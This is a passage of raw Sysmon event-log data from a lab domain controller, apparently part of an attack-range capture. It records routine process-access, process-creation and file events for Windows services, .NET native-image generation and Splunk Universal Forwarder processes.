21:06:53.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.640{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A26D-60D3-2305-00000000CF01}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.608{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26D-60D3-2305-00000000CF01}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.608{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26D-60D3-2305-00000000CF01}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.618{4DB9351A-A26D-60D3-2305-00000000CF01}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.593{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26D-60D3-2205-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.580{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26D-60D3-2205-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.580{4DB9351A-A26C-60D3-2005-00000000CF01}4352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6ABGDLHVSY\System.Runtime.Serialization.ni.dll.auxMD5=F0A443928F6B26BA650A6E03119EC1DB,SHA256=2B7697858567703EC98012F2CAB1362AE1F12B0400927D712EAF70360B98F247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.580{4DB9351A-A26C-60D3-2005-00000000CF01}4352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6ABGDLHVSY\System.Runtime.Serialization.ni.dllMD5=AB184B9B5B27E1D16DEC49AF25D626CC,SHA256=F87F1D5873AC30887C8978BD0D6C8780B14B49F9595D18D47524C1BA9EC6D95C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.301{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E216F441D75D235239D30AE7FBC5220,SHA256=273C362A5F49A414151A272EBF2C10ED17A2946C49CE178493D8D19EC48FB614,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x800000000000000022506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.108{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AF49DC34976838FFE0C26FA58AB1512,SHA256=72500DB3B65014DA01A150003D77EC9D27AF813C5A3A45D92F790128FF62C4BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.030{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-2005-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A26E-60D3-2405-00000000CF01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26E-60D3-2405-00000000CF01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26E-60D3-2405-00000000CF01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.485{4DB9351A-A26E-60D3-2405-00000000CF01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 